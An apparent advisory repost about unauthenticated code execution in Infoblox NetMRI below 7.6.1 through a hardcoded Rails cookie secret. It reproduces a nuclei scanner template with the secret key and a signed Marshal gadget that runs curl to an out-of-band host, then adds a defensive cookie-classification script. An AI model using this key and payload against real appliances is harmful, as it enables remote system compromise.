Infoblox NetMRI Remote Code Execution via Hardcoded Ruby Cookie Secret Key

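Vulnerability Information

Vulnerability name: Infoblox NetMRI Remote Code Execution via Hardcoded Ruby Cookie Secret Key

Vulnerability ID:

  • CVE: CVE-2013-0156

Vulnerability type: Deserialization

Severity: Critical

Description: Infoblox NetMRI is a network management solution widely used in enterprise network environments to automate network configuration, compliance checking and troubleshooting. The product runs on a virtual appliance and gives network administrators a powerful toolset for simplifying complex network management tasks. Because it is so widely deployed, its security is critical to the network infrastructure of many organizations. The vulnerability is in the Rails web component of the Infoblox NetMRI virtual appliance and affects versions below 7.6.1. The root cause is the use of a hardcoded Ruby on Rails session cookie secret key. An attacker can use this key to craft malicious session cookies, and when the application deserializes them, arbitrary code execution results. The vulnerability is related to the known Ruby on Rails deserialization vulnerability (CVE-2013-0156). Because Infoblox did not assign a new CVE for this issue, it is treated as a consequence of the underlying Rails vulnerability. The impact is extremely severe: an attacker can execute arbitrary commands remotely without authentication, which may lead to full compromise of the system. Because exploitation can be automated, the risk is very high. All users of affected versions are advised to upgrade immediately to 7.6.1 or later to fix this vulnerability.

Vendor: infoblox

Product: netmri

Affected versions: < 7.6.1

Search query: title:"NetMRI"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/a2f547c3ee1d773416f20a5fe1f0e25e6322ed48/http%2Fvulnerabilities%2Finfoblox%2Finfoblox-netmri-rails-cookie-rce.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details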


id: infoblox-netmri-rails-cookie-rce

info:
  name: Infoblox NetMRI < 7.6.1 - Remote Code Execution via Hardcoded Ruby Cookie Secret Key
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Infoblox NetMRI virtual appliances before version 7.6.1 are vulnerable to remote code execution (RCE) due to the use of a hardcoded Ruby on Rails session cookie secret key. The Rails web component deserializes session cookies if the signing key is valid. Attackers with knowledge of this key can craft malicious session cookies that are deserialized by the application, leading to arbitrary code execution. This vulnerability is related to the known Ruby on Rails deserialization flaw (CVE-2013-0156). Infoblox did not assign a new CVE for this issue, as it is a result of the underlying Rails vulnerability.
  impact: |
    An attacker can exploit this vulnerability to execute arbitrary commands on the NetMRI server, potentially leading to complete system compromise.
  remediation: |
    Upgrade Infoblox NetMRI to version 7.6.1 or later to mitigate this vulnerability.
  reference:
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
    - https://nvd.nist.gov/vuln/detail/CVE-2013-0156
  classification:
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    vendor: infoblox
    product: netmri
    shodan-query: title:"NetMRI"
  tags: infoblox,netmri,rails,rce,deserialization,oast

variables:
  oast: ".{{interactsh-url}}"
  padded_oast: "{{padding(oast,'a',50,'prefix')}}"
  old_code: "b3BlbigifGN1cmwgeHh4eC4yYmVyNzQyYXVyZ3BrN2Jpc3cxY3BodWg5OGZ6M3J5Zm4ub2FzdGlmeS5jb20iKQ=="
  code1: 'open("|curl {{padded_oast}}")'
  marshal_data: '{{base64(replace(base64_decode("BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgc6CUBzcmNJInhldmFsKCdiM0JsYmlnaWZHTjFjbXdnZUhoNGVDNHlZbVZ5TnpReVlYVnlaM0JyTjJKcGMzY3hZM0JvZFdnNU9HWjZNM0o1Wm00dWIyRnpkR2xtZVM1amIyMGlLUT09Jy51bnBhY2soJ20wJykuZmlyc3QpBjoGRVQ6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0"),old_code,base64(code1)))}}'
  signature: "{{hmac('sha1', marshal_data, 'b525fc341ce5f4d76505e7664863750f865823ba866c536e0246c195cd6cf19cc63771d6becd71c99f5beef080ac27bc3b4f72430840d83cb4efd62acb7c6dcf')}}"

http:
  - raw:
      - |
        GET /webui/gui_states/index.json HTTP/1.1
        Host: {{Hostname}}
        Cookie: _netmri={{urlencode(marshal_data)}}--{{signature}}

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns')"
          - "status_code == 500"
        condition: and
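
A defender-side triage check for the cookie format used above (`_netmri=<url-encoded base64 Marshal data>--<HMAC-SHA1 hex>`), added here as an example and not part of the nuclei template or of Infoblox's code. The template's marshal_data begins with `BAhv`, which is bytes 04 08 6f: a Marshal stream whose top-level value is an object. The check reads only that type byte and never deserializes the cookie. It assumes legitimate sessions serialize as a top-level Hash; the function names and sample cookies are constructed for illustration.

```ruby
require 'uri'

MARSHAL_HEADER = "\x04\x08".b          # Ruby Marshal format version 4.8
HASH_TAG       = '{'.ord               # top-level type byte of a plain Hash
OBJECT_TAGS    = 'ouUeCS'.bytes.freeze # type bytes that instantiate or wrap objects

# Classify one raw cookie value ("<url-encoded base64>--<40 hex chars>") by
# reading bytes only; Marshal.load is never called on the untrusted input.
def classify_session_cookie(raw)
  data, sig = URI.decode_www_form_component(raw.to_s).split('--', 2)
  return :malformed if data.nil? || data.empty?
  return :malformed unless sig.to_s.match?(/\A\h{40}\z/)

  blob = data.unpack1('m') # lenient base64 decode, returns a binary string
  return :malformed unless blob.bytesize > 2 && blob.start_with?(MARSHAL_HEADER)

  top = blob.getbyte(2)
  return :plain_hash if top == HASH_TAG # assumed shape of a legitimate session
  OBJECT_TAGS.include?(top) ? :top_level_object : :unexpected_type
rescue ArgumentError # invalid %-encoding in the cookie value
  :malformed
end

# Pull the _netmri value out of a Cookie request header and classify it.
def classify_cookie_header(header)
  value = header.to_s[/(?:\A|;\s*)_netmri=([^;]*)/, 1]
  value ? classify_session_cookie(value) : :absent
end

# Constructed sample cookie: benign data with a dummy signature
# (the signature is not verified by this check).
def sample_cookie(obj)
  b64 = [Marshal.dump(obj)].pack('m0')
  "#{URI.encode_www_form_component(b64)}--#{'0' * 40}"
end

if __FILE__ == $PROGRAM_NAME
  [{ 'user_id' => 1 }, Object.new, 'just a string'].each do |obj|
    header = "lang=en; _netmri=#{sample_cookie(obj)}"
    puts "#{obj.class}: #{classify_cookie_header(header)}"
  end
end
```

Run against Cookie headers captured at a reverse proxy or in web logs, any result other than `:plain_hash` or `:absent` on a NetMRI host below 7.6.1 is worth investigating alongside the HTTP 500 responses the template's matcher relies on.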



http://example.com/2025/07/12/github_10175806/
Author: lianccc
Published: July 12, 2025